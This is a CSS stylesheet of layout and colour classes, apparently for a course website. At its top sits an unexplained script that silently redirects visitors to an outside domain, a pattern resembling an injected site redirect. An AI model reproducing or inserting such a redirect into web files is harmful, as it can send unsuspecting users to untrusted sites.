<script>
  window.location.replace("http://www.cfedundrum.com/front")
</script>

side {
	font-family: Georgia, "Times New Roman", Times, serif;
	font-size: 10px;
	font-style: italic;
	font-weight: bold;
	font-variant: small-caps;
	color: #333333;
	background-color: #E2EFD5;
	border: thin dotted #BBCAE9;
}
.side2 {
	border: thin dotted #ECECFF;
	font-family: Georgia, "Times New Roman", Times, serif;
	font-size: 9px;
	font-style: italic;
	font-weight: bold;
	color: #333333;
	width: 125px;
}
.side3 {
	background-color: #BBCAE9;
	font-family: Arial, Helvetica, sans-serif;
	font-size: 14px;
	color: #E2EFD5;
	height: 26px;
	width: 150px;
	border-top: thin dashed #FF6600;
	border-right: thin none #FF6600;
	border-bottom: thin dashed #FF6600;
	border-left: thin dashed #FF6600;
}
.side4 {
	width: 600px;
	height: 26px;
	border-top: thin dashed #FF6600;
	border-right: thin dashed #FF6600;
	border-bottom: thin dashed #FF6600;
	border-left: thin none #FF6600;
	background-color: #E3F0D6;
}
.main {
	width: 460px;
	border: thin none #F5F8FC;
	font-family: Georgia, "Times New Roman", Times, serif;
	font-size: 12px;
	font-style: normal;
	font-weight: 100;
	font-variant: normal;
	color: #000033;
}
.around {
	border: dotted #E2EFD5;
}
.Coursepanel {
	border: thin solid #CCCCCC;
	background-color: #BEC7EE;
	color: #000066;
	font-weight: bolder;
	text-transform: capitalize;
	font-family: Arial, Helvetica, sans-serif;
}
.leftside {
	color: #202F84;
	border: thin dotted #F0F0F0;
}
.applic {
	background-color: #FFFF99;
}
